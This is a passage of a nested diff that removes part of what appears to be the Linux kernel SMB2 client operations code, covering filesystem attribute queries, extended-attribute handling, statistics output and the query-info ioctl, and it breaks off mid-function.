+-		rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+-			       NULL, NULL);
+-	if (rc)
+-		return;
+-
+-	SMB3_request_interfaces(xid, tcon, true /* called during  mount */);
+-
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_ATTRIBUTE_INFORMATION);
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_DEVICE_INFORMATION);
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_VOLUME_INFORMATION);
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_SECTOR_SIZE_INFORMATION); /* SMB3 specific */
+-	if (cfid == NULL)
+-		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-	else
+-		close_cached_dir(cfid);
+-}
+-
+-static void
+-smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+-	      struct cifs_sb_info *cifs_sb)
+-{
+-	int rc;
+-	__le16 srch_path = 0; /* Null - open root of share */
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = "",
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+-		       NULL, NULL);
+-	if (rc)
+-		return;
+-
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_ATTRIBUTE_INFORMATION);
+-	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-			FS_DEVICE_INFORMATION);
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-}
+-
+-static int
+-smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct cifs_sb_info *cifs_sb, const char *full_path)
+-{
+-	__le16 *utf16_path;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	int err_buftype = CIFS_NO_BUFFER;
+-	struct cifs_open_parms oparms;
+-	struct kvec err_iov = {};
+-	struct cifs_fid fid;
+-	struct cached_fid *cfid;
+-	bool islink;
+-	int rc, rc2;
+-
+-	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, true, &cfid);
+-	if (!rc) {
+-		if (cfid->has_lease) {
+-			close_cached_dir(cfid);
+-			return 0;
+-		}
+-		close_cached_dir(cfid);
+-	}
+-
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = full_path,
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+-		       &err_iov, &err_buftype);
+-	if (rc) {
+-		struct smb2_hdr *hdr = err_iov.iov_base;
+-
+-		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
+-			goto out;
+-
+-		if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
+-			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
+-							     full_path, &islink);
+-			if (rc2) {
+-				rc = rc2;
+-				goto out;
+-			}
+-			if (islink)
+-				rc = -EREMOTE;
+-		}
+-		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+-		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+-			rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	rc = SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-
+-out:
+-	free_rsp_buf(err_buftype, err_iov.iov_base);
+-	kfree(utf16_path);
+-	return rc;
+-}
+-
+-static int smb2_get_srv_inum(const unsigned int xid, struct cifs_tcon *tcon,
+-			     struct cifs_sb_info *cifs_sb, const char *full_path,
+-			     u64 *uniqueid, struct cifs_open_info_data *data)
+-{
+-	*uniqueid = le64_to_cpu(data->fi.IndexNumber);
+-	return 0;
+-}
+-
+-static int smb2_query_file_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifsFileInfo *cfile, struct cifs_open_info_data *data)
+-{
+-	struct cifs_fid *fid = &cfile->fid;
+-
+-	if (cfile->symlink_target) {
+-		data->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-		if (!data->symlink_target)
+-			return -ENOMEM;
+-	}
+-	return SMB2_query_info(xid, tcon, fid->persistent_fid, fid->volatile_fid, &data->fi);
+-}
+-
+-#ifdef CONFIG_CIFS_XATTR
+-static ssize_t
+-move_smb2_ea_to_cifs(char *dst, size_t dst_size,
+-		     struct smb2_file_full_ea_info *src, size_t src_size,
+-		     const unsigned char *ea_name)
+-{
+-	int rc = 0;
+-	unsigned int ea_name_len = ea_name ? strlen(ea_name) : 0;
+-	char *name, *value;
+-	size_t buf_size = dst_size;
+-	size_t name_len, value_len, user_name_len;
+-
+-	while (src_size > 0) {
+-		name_len = (size_t)src->ea_name_length;
+-		value_len = (size_t)le16_to_cpu(src->ea_value_length);
+-
+-		if (name_len == 0)
+-			break;
+-
+-		if (src_size < 8 + name_len + 1 + value_len) {
+-			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
+-			rc = -EIO;
+-			goto out;
+-		}
+-
+-		name = &src->ea_data[0];
+-		value = &src->ea_data[src->ea_name_length + 1];
+-
+-		if (ea_name) {
+-			if (ea_name_len == name_len &&
+-			    memcmp(ea_name, name, name_len) == 0) {
+-				rc = value_len;
+-				if (dst_size == 0)
+-					goto out;
+-				if (dst_size < value_len) {
+-					rc = -ERANGE;
+-					goto out;
+-				}
+-				memcpy(dst, value, value_len);
+-				goto out;
+-			}
+-		} else {
+-			/* 'user.' plus a terminating null */
+-			user_name_len = 5 + 1 + name_len;
+-
+-			if (buf_size == 0) {
+-				/* skip copy - calc size only */
+-				rc += user_name_len;
+-			} else if (dst_size >= user_name_len) {
+-				dst_size -= user_name_len;
+-				memcpy(dst, "user.", 5);
+-				dst += 5;
+-				memcpy(dst, src->ea_data, name_len);
+-				dst += name_len;
+-				*dst = 0;
+-				++dst;
+-				rc += user_name_len;
+-			} else {
+-				/* stop before overrun buffer */
+-				rc = -ERANGE;
+-				break;
+-			}
+-		}
+-
+-		if (!src->next_entry_offset)
+-			break;
+-
+-		if (src_size < le32_to_cpu(src->next_entry_offset)) {
+-			/* stop before overrun buffer */
+-			rc = -ERANGE;
+-			break;
+-		}
+-		src_size -= le32_to_cpu(src->next_entry_offset);
+-		src = (void *)((char *)src +
+-			       le32_to_cpu(src->next_entry_offset));
+-	}
+-
+-	/* didn't find the named attribute */
+-	if (ea_name)
+-		rc = -ENODATA;
+-
+-out:
+-	return (ssize_t)rc;
+-}
+-
+-static ssize_t
+-smb2_query_eas(const unsigned int xid, struct cifs_tcon *tcon,
+-	       const unsigned char *path, const unsigned char *ea_name,
+-	       char *ea_data, size_t buf_size,
+-	       struct cifs_sb_info *cifs_sb)
+-{
+-	int rc;
+-	struct kvec rsp_iov = {NULL, 0};
+-	int buftype = CIFS_NO_BUFFER;
+-	struct smb2_query_info_rsp *rsp;
+-	struct smb2_file_full_ea_info *info = NULL;
+-
+-	rc = smb2_query_info_compound(xid, tcon, path,
+-				      FILE_READ_EA,
+-				      FILE_FULL_EA_INFORMATION,
+-				      SMB2_O_INFO_FILE,
+-				      CIFSMaxBufSize -
+-				      MAX_SMB2_CREATE_RESPONSE_SIZE -
+-				      MAX_SMB2_CLOSE_RESPONSE_SIZE,
+-				      &rsp_iov, &buftype, cifs_sb);
+-	if (rc) {
+-		/*
+-		 * If ea_name is NULL (listxattr) and there are no EAs,
+-		 * return 0 as it's not an error. Otherwise, the specified
+-		 * ea_name was not found.
+-		 */
+-		if (!ea_name && rc == -ENODATA)
+-			rc = 0;
+-		goto qeas_exit;
+-	}
+-
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength),
+-			       &rsp_iov,
+-			       sizeof(struct smb2_file_full_ea_info));
+-	if (rc)
+-		goto qeas_exit;
+-
+-	info = (struct smb2_file_full_ea_info *)(
+-			le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
+-	rc = move_smb2_ea_to_cifs(ea_data, buf_size, info,
+-			le32_to_cpu(rsp->OutputBufferLength), ea_name);
+-
+- qeas_exit:
+-	free_rsp_buf(buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-
+-static int
+-smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+-	    const char *path, const char *ea_name, const void *ea_value,
+-	    const __u16 ea_value_len, const struct nls_table *nls_codepage,
+-	    struct cifs_sb_info *cifs_sb)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	__le16 *utf16_path = NULL;
+-	int ea_name_len = strlen(ea_name);
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	int len;
+-	struct smb_rqst rqst[3];
+-	int resp_buftype[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct cifs_open_parms oparms;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_fid fid;
+-	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
+-	unsigned int size[1];
+-	void *data[1];
+-	struct smb2_file_full_ea_info *ea = NULL;
+-	struct kvec close_iov[1];
+-	struct smb2_query_info_rsp *rsp;
+-	int rc, used_len = 0;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	if (ea_name_len > 255)
+-		return -EINVAL;
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	if (ses->server->ops->query_all_EAs) {
+-		if (!ea_value) {
+-			rc = ses->server->ops->query_all_EAs(xid, tcon, path,
+-							     ea_name, NULL, 0,
+-							     cifs_sb);
+-			if (rc == -ENODATA)
+-				goto sea_exit;
+-		} else {
+-			/* If we are adding a attribute we should first check
+-			 * if there will be enough space available to store
+-			 * the new EA. If not we should not add it since we
+-			 * would not be able to even read the EAs back.
+-			 */
+-			rc = smb2_query_info_compound(xid, tcon, path,
+-				      FILE_READ_EA,
+-				      FILE_FULL_EA_INFORMATION,
+-				      SMB2_O_INFO_FILE,
+-				      CIFSMaxBufSize -
+-				      MAX_SMB2_CREATE_RESPONSE_SIZE -
+-				      MAX_SMB2_CLOSE_RESPONSE_SIZE,
+-				      &rsp_iov[1], &resp_buftype[1], cifs_sb);
+-			if (rc == 0) {
+-				rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+-				used_len = le32_to_cpu(rsp->OutputBufferLength);
+-			}
+-			free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-			resp_buftype[1] = CIFS_NO_BUFFER;
+-			memset(&rsp_iov[1], 0, sizeof(rsp_iov[1]));
+-			rc = 0;
+-
+-			/* Use a fudge factor of 256 bytes in case we collide
+-			 * with a different set_EAs command.
+-			 */
+-			if(CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
+-			   MAX_SMB2_CLOSE_RESPONSE_SIZE - 256 <
+-			   used_len + ea_name_len + ea_value_len + 1) {
+-				rc = -ENOSPC;
+-				goto sea_exit;
+-			}
+-		}
+-	}
+-
+-	/* Open */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.desired_access = FILE_WRITE_EA,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto sea_exit;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-
+-	/* Set Info */
+-	memset(&si_iov, 0, sizeof(si_iov));
+-	rqst[1].rq_iov = si_iov;
+-	rqst[1].rq_nvec = 1;
+-
+-	len = sizeof(*ea) + ea_name_len + ea_value_len + 1;
+-	ea = kzalloc(len, GFP_KERNEL);
+-	if (ea == NULL) {
+-		rc = -ENOMEM;
+-		goto sea_exit;
+-	}
+-
+-	ea->ea_name_length = ea_name_len;
+-	ea->ea_value_length = cpu_to_le16(ea_value_len);
+-	memcpy(ea->ea_data, ea_name, ea_name_len + 1);
+-	memcpy(ea->ea_data + ea_name_len + 1, ea_value, ea_value_len);
+-
+-	size[0] = len;
+-	data[0] = ea;
+-
+-	rc = SMB2_set_info_init(tcon, server,
+-				&rqst[1], COMPOUND_FID,
+-				COMPOUND_FID, current->tgid,
+-				FILE_FULL_EA_INFORMATION,
+-				SMB2_O_INFO_FILE, 0, data, size);
+-	if (rc)
+-		goto sea_exit;
+-	smb2_set_next_command(tcon, &rqst[1]);
+-	smb2_set_related(&rqst[1]);
+-
+-
+-	/* Close */
+-	memset(&close_iov, 0, sizeof(close_iov));
+-	rqst[2].rq_iov = close_iov;
+-	rqst[2].rq_nvec = 1;
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto sea_exit;
+-	smb2_set_related(&rqst[2]);
+-
+-	rc = compound_send_recv(xid, ses, server,
+-				flags, 3, rqst,
+-				resp_buftype, rsp_iov);
+-	/* no need to bump num_remote_opens because handle immediately closed */
+-
+- sea_exit:
+-	kfree(ea);
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_set_info_free(&rqst[1]);
+-	SMB2_close_free(&rqst[2]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	return rc;
+-}
+-#endif
+-
+-static bool
+-smb2_can_echo(struct TCP_Server_Info *server)
+-{
+-	return server->echoes;
+-}
+-
+-static void
+-smb2_clear_stats(struct cifs_tcon *tcon)
+-{
+-	int i;
+-
+-	for (i = 0; i < NUMBER_OF_SMB2_COMMANDS; i++) {
+-		atomic_set(&tcon->stats.smb2_stats.smb2_com_sent[i], 0);
+-		atomic_set(&tcon->stats.smb2_stats.smb2_com_failed[i], 0);
+-	}
+-}
+-
+-static void
+-smb2_dump_share_caps(struct seq_file *m, struct cifs_tcon *tcon)
+-{
+-	seq_puts(m, "\n\tShare Capabilities:");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_DFS)
+-		seq_puts(m, " DFS,");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY)
+-		seq_puts(m, " CONTINUOUS AVAILABILITY,");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_SCALEOUT)
+-		seq_puts(m, " SCALEOUT,");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_CLUSTER)
+-		seq_puts(m, " CLUSTER,");
+-	if (tcon->capabilities & SMB2_SHARE_CAP_ASYMMETRIC)
+-		seq_puts(m, " ASYMMETRIC,");
+-	if (tcon->capabilities == 0)
+-		seq_puts(m, " None");
+-	if (tcon->ss_flags & SSINFO_FLAGS_ALIGNED_DEVICE)
+-		seq_puts(m, " Aligned,");
+-	if (tcon->ss_flags & SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE)
+-		seq_puts(m, " Partition Aligned,");
+-	if (tcon->ss_flags & SSINFO_FLAGS_NO_SEEK_PENALTY)
+-		seq_puts(m, " SSD,");
+-	if (tcon->ss_flags & SSINFO_FLAGS_TRIM_ENABLED)
+-		seq_puts(m, " TRIM-support,");
+-
+-	seq_printf(m, "\tShare Flags: 0x%x", tcon->share_flags);
+-	seq_printf(m, "\n\ttid: 0x%x", tcon->tid);
+-	if (tcon->perf_sector_size)
+-		seq_printf(m, "\tOptimal sector size: 0x%x",
+-			   tcon->perf_sector_size);
+-	seq_printf(m, "\tMaximal Access: 0x%x", tcon->maximal_access);
+-}
+-
+-static void
+-smb2_print_stats(struct seq_file *m, struct cifs_tcon *tcon)
+-{
+-	atomic_t *sent = tcon->stats.smb2_stats.smb2_com_sent;
+-	atomic_t *failed = tcon->stats.smb2_stats.smb2_com_failed;
+-
+-	/*
+-	 *  Can't display SMB2_NEGOTIATE, SESSION_SETUP, LOGOFF, CANCEL and ECHO
+-	 *  totals (requests sent) since those SMBs are per-session not per tcon
+-	 */
+-	seq_printf(m, "\nBytes read: %llu  Bytes written: %llu",
+-		   (long long)(tcon->bytes_read),
+-		   (long long)(tcon->bytes_written));
+-	seq_printf(m, "\nOpen files: %d total (local), %d open on server",
+-		   atomic_read(&tcon->num_local_opens),
+-		   atomic_read(&tcon->num_remote_opens));
+-	seq_printf(m, "\nTreeConnects: %d total %d failed",
+-		   atomic_read(&sent[SMB2_TREE_CONNECT_HE]),
+-		   atomic_read(&failed[SMB2_TREE_CONNECT_HE]));
+-	seq_printf(m, "\nTreeDisconnects: %d total %d failed",
+-		   atomic_read(&sent[SMB2_TREE_DISCONNECT_HE]),
+-		   atomic_read(&failed[SMB2_TREE_DISCONNECT_HE]));
+-	seq_printf(m, "\nCreates: %d total %d failed",
+-		   atomic_read(&sent[SMB2_CREATE_HE]),
+-		   atomic_read(&failed[SMB2_CREATE_HE]));
+-	seq_printf(m, "\nCloses: %d total %d failed",
+-		   atomic_read(&sent[SMB2_CLOSE_HE]),
+-		   atomic_read(&failed[SMB2_CLOSE_HE]));
+-	seq_printf(m, "\nFlushes: %d total %d failed",
+-		   atomic_read(&sent[SMB2_FLUSH_HE]),
+-		   atomic_read(&failed[SMB2_FLUSH_HE]));
+-	seq_printf(m, "\nReads: %d total %d failed",
+-		   atomic_read(&sent[SMB2_READ_HE]),
+-		   atomic_read(&failed[SMB2_READ_HE]));
+-	seq_printf(m, "\nWrites: %d total %d failed",
+-		   atomic_read(&sent[SMB2_WRITE_HE]),
+-		   atomic_read(&failed[SMB2_WRITE_HE]));
+-	seq_printf(m, "\nLocks: %d total %d failed",
+-		   atomic_read(&sent[SMB2_LOCK_HE]),
+-		   atomic_read(&failed[SMB2_LOCK_HE]));
+-	seq_printf(m, "\nIOCTLs: %d total %d failed",
+-		   atomic_read(&sent[SMB2_IOCTL_HE]),
+-		   atomic_read(&failed[SMB2_IOCTL_HE]));
+-	seq_printf(m, "\nQueryDirectories: %d total %d failed",
+-		   atomic_read(&sent[SMB2_QUERY_DIRECTORY_HE]),
+-		   atomic_read(&failed[SMB2_QUERY_DIRECTORY_HE]));
+-	seq_printf(m, "\nChangeNotifies: %d total %d failed",
+-		   atomic_read(&sent[SMB2_CHANGE_NOTIFY_HE]),
+-		   atomic_read(&failed[SMB2_CHANGE_NOTIFY_HE]));
+-	seq_printf(m, "\nQueryInfos: %d total %d failed",
+-		   atomic_read(&sent[SMB2_QUERY_INFO_HE]),
+-		   atomic_read(&failed[SMB2_QUERY_INFO_HE]));
+-	seq_printf(m, "\nSetInfos: %d total %d failed",
+-		   atomic_read(&sent[SMB2_SET_INFO_HE]),
+-		   atomic_read(&failed[SMB2_SET_INFO_HE]));
+-	seq_printf(m, "\nOplockBreaks: %d sent %d failed",
+-		   atomic_read(&sent[SMB2_OPLOCK_BREAK_HE]),
+-		   atomic_read(&failed[SMB2_OPLOCK_BREAK_HE]));
+-}
+-
+-static void
+-smb2_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
+-
+-	cfile->fid.persistent_fid = fid->persistent_fid;
+-	cfile->fid.volatile_fid = fid->volatile_fid;
+-	cfile->fid.access = fid->access;
+-#ifdef CONFIG_CIFS_DEBUG2
+-	cfile->fid.mid = fid->mid;
+-#endif /* CIFS_DEBUG2 */
+-	server->ops->set_oplock_level(cinode, oplock, fid->epoch,
+-				      &fid->purge_cache);
+-	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
+-	memcpy(cfile->fid.create_guid, fid->create_guid, 16);
+-}
+-
+-static void
+-smb2_close_file(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifs_fid *fid)
+-{
+-	SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+-}
+-
+-static void
+-smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile)
+-{
+-	struct smb2_file_network_open_info file_inf;
+-	struct inode *inode;
+-	int rc;
+-
+-	rc = __SMB2_close(xid, tcon, cfile->fid.persistent_fid,
+-		   cfile->fid.volatile_fid, &file_inf);
+-	if (rc)
+-		return;
+-
+-	inode = d_inode(cfile->dentry);
+-
+-	spin_lock(&inode->i_lock);
+-	CIFS_I(inode)->time = jiffies;
+-
+-	/* Creation time should not need to be updated on close */
+-	if (file_inf.LastWriteTime)
+-		inode->i_mtime = cifs_NTtimeToUnix(file_inf.LastWriteTime);
+-	if (file_inf.ChangeTime)
+-		inode->i_ctime = cifs_NTtimeToUnix(file_inf.ChangeTime);
+-	if (file_inf.LastAccessTime)
+-		inode->i_atime = cifs_NTtimeToUnix(file_inf.LastAccessTime);
+-
+-	/*
+-	 * i_blocks is not related to (i_size / i_blksize),
+-	 * but instead 512 byte (2**9) size is required for
+-	 * calculating num blocks.
+-	 */
+-	if (le64_to_cpu(file_inf.AllocationSize) > 4096)
+-		inode->i_blocks =
+-			(512 - 1 + le64_to_cpu(file_inf.AllocationSize)) >> 9;
+-
+-	/* End of file and Attributes should not have to be updated on close */
+-	spin_unlock(&inode->i_lock);
+-}
+-
+-static int
+-SMB2_request_res_key(const unsigned int xid, struct cifs_tcon *tcon,
+-		     u64 persistent_fid, u64 volatile_fid,
+-		     struct copychunk_ioctl *pcchunk)
+-{
+-	int rc;
+-	unsigned int ret_data_len;
+-	struct resume_key_req *res_key;
+-
+-	rc = SMB2_ioctl(xid, tcon, persistent_fid, volatile_fid,
+-			FSCTL_SRV_REQUEST_RESUME_KEY, NULL, 0 /* no input */,
+-			CIFSMaxBufSize, (char **)&res_key, &ret_data_len);
+-
+-	if (rc == -EOPNOTSUPP) {
+-		pr_warn_once("Server share %s does not support copy range\n", tcon->tree_name);
+-		goto req_res_key_exit;
+-	} else if (rc) {
+-		cifs_tcon_dbg(VFS, "refcpy ioctl error %d getting resume key\n", rc);
+-		goto req_res_key_exit;
+-	}
+-	if (ret_data_len < sizeof(struct resume_key_req)) {
+-		cifs_tcon_dbg(VFS, "Invalid refcopy resume key length\n");
+-		rc = -EINVAL;
+-		goto req_res_key_exit;
+-	}
+-	memcpy(pcchunk->SourceKey, res_key->ResumeKey, COPY_CHUNK_RES_KEY_SIZE);
+-
+-req_res_key_exit:
+-	kfree(res_key);
+-	return rc;
+-}
+-
+-struct iqi_vars {
+-	struct smb_rqst rqst[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qi_iov[1];
+-	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
+-	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
+-	struct kvec close_iov[1];
+-};
+-
+-static int
+-smb2_ioctl_query_info(const unsigned int xid,
+-		      struct cifs_tcon *tcon,
+-		      struct cifs_sb_info *cifs_sb,
+-		      __le16 *path, int is_dir,
+-		      unsigned long p)
+-{
+-	struct iqi_vars *vars;
+-	struct smb_rqst *rqst;
+-	struct kvec *rsp_iov;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	char __user *arg = (char __user *)p;
+-	struct smb_query_info qi;
+-	struct smb_query_info __user *pqi;
+-	int rc = 0;
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	struct smb2_query_info_rsp *qi_rsp = NULL;
+-	struct smb2_ioctl_rsp *io_rsp = NULL;
+-	void *buffer = NULL;
+-	int resp_buftype[3];
+-	struct cifs_open_parms oparms;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_fid fid;
+-	unsigned int size[2];
+-	void *data[2];
+-	int create_options = is_dir ? CREATE_NOT_FILE : CREATE_NOT_DIR;
+-	void (*free_req1_func)(struct smb_rqst *r);
+-
+-	vars = kzalloc(sizeof(*vars), GFP_ATOMIC);
+-	if (vars == NULL)
+-		return -ENOMEM;
+-	rqst = &vars->rqst[0];
+-	rsp_iov = &vars->rsp_iov[0];
+-
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-
+-	if (copy_from_user(&qi, arg, sizeof(struct smb_query_info))) {
+-		rc = -EFAULT;
+-		goto free_vars;
+-	}
+-	if (qi.output_buffer_length > 1024) {
+-		rc = -EINVAL;
+-		goto free_vars;
+-	}
+-
+-	if (!ses || !server) {
+-		rc = -EIO;
+-		goto free_vars;
+-	}
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	if (qi.output_buffer_length) {
+-		buffer = memdup_user(arg + sizeof(struct smb_query_info), qi.output_buffer_length);
+-		if (IS_ERR(buffer)) {
+-			rc = PTR_ERR(buffer);
+-			goto free_vars;
+-		}
+-	}
+-
+-	/* Open */
+-	rqst[0].rq_iov = &vars->open_iov[0];
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.fid = &fid,
+-	};
+-
+-	if (qi.flags & PASSTHRU_FSCTL) {
+-		switch (qi.info_type & FSCTL_DEVICE_ACCESS_MASK) {
+-		case FSCTL_DEVICE_ACCESS_FILE_READ_WRITE_ACCESS:
+-			oparms.desired_access = FILE_READ_DATA | FILE_WRITE_DATA | FILE_READ_ATTRIBUTES | SYNCHRONIZE;
+-			break;
+-		case FSCTL_DEVICE_ACCESS_FILE_ANY_ACCESS:
+-			oparms.desired_access = GENERIC_ALL;
+-			break;
+-		case FSCTL_DEVICE_ACCESS_FILE_READ_ACCESS:
+-			oparms.desired_access = GENERIC_READ;
+-			break;
+-		case FSCTL_DEVICE_ACCESS_FILE_WRITE_ACCESS:
+-			oparms.desired_access = GENERIC_WRITE;
+-			break;
+-		}
+-	} else if (qi.flags & PASSTHRU_SET_INFO) {
+-		oparms.desired_access = GENERIC_WRITE;
+-	} else {
+-		oparms.desired_access = FILE_READ_ATTRIBUTES | READ_CONTROL;
+-	}
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, path);
+-	if (rc)
+-		goto free_output_buffer;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-	/* Query */
+-	if (qi.flags & PASSTHRU_FSCTL) {
+-		/* Can eventually relax perm check since server enforces too */
+-		if (!capable(CAP_SYS_ADMIN)) {
+-			rc = -EPERM;
+-			goto free_open_req;
+-		}
+-		rqst[1].rq_iov = &vars->io_iov[0];
+-		rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
+-
+-		rc = SMB2_ioctl_init(tcon, server, &rqst[1], COMPOUND_FID, COMPOUND_FID,
+-				     qi.info_type, buffer, qi.output_buffer_length,
+-				     CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
+-				     MAX_SMB2_CLOSE_RESPONSE_SIZE);
+-		free_req1_func = SMB2_ioctl_free;
+-	} else if (qi.flags == PASSTHRU_SET_INFO) {
+-		/* Can eventually relax perm check since server enforces too */
+-		if (!capable(CAP_SYS_ADMIN)) {
+-			rc = -EPERM;
+-			goto free_open_req;
+-		}
+-		if (qi.output_buffer_length < 8) {
+-			rc = -EINVAL;
+-			goto free_open_req;
+-		}
+-		rqst[1].rq_iov = &vars->si_iov[0];
+-		rqst[1].rq_nvec = 1;
+-
+-		/* MS-FSCC 2.4.13 FileEndOfFileInformation */
+-		size[0] = 8;
+-		data[0] = buffer;
+-
+-		rc = SMB2_set_info_init(tcon, server, &rqst[1], COMPOUND_FID, COMPOUND_FID,
+-					current->tgid, FILE_END_OF_FILE_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-		free_req1_func = SMB2_set_info_free;
+-	} else if (qi.flags == PASSTHRU_QUERY_INFO) {
+-		rqst[1].rq_iov = &vars->qi_iov[0];
+-		rqst[1].rq_nvec = 1;
+-
+-		rc = SMB2_query_info_init(tcon, server,
+-				  &rqst[1], COMPOUND_FID,
+-				  COMPOUND_FID, qi.file_info_class,
+-				  qi.info_type, qi.additional_information,
+-				  qi.input_buffer_length,
+-				  qi.output_buffer_length, buffer);
+-		free_req1_func = SMB2_query_info_free;
